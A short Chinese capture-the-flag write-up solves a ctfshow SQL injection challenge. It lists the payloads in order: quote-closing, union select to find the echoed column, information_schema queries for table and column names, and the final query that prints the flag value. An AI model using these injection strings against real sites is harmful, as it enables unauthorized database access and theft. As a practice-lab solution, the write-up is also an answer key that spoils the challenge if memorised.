从题目上的提示看 这是sql注入
题目是这样的
先用单引号闭合看一下效果
1' or 1=1 #
返回这样的显示
那么接下来进行常规的注入语句
用order by 语句 探测字段数 一直也探测不出来 那就换个思路 直接查询字段数
1' union select 1,2,3 #
用这个语句 探测到3 的 时候 回头显示了一个2 那么回显点就在第二个字段上 那么接下来就好操作了 直接替换2字段在上面做操作
查询表名:1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --
查到了两个表
先在flag这个表里入手
查询字段名:1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='flag' --
在flag表里面 查到了一个叫flag的字段
那么字段里面肯定就是flag个了
用下面语句
查询flag字段 在flag表里面
1' union select 1,flag,3 from flag #
得到flag如下:
欢迎你,ctfshow{45bfd2b4-e0e1-4d12-8c01-ac3b568d40fc}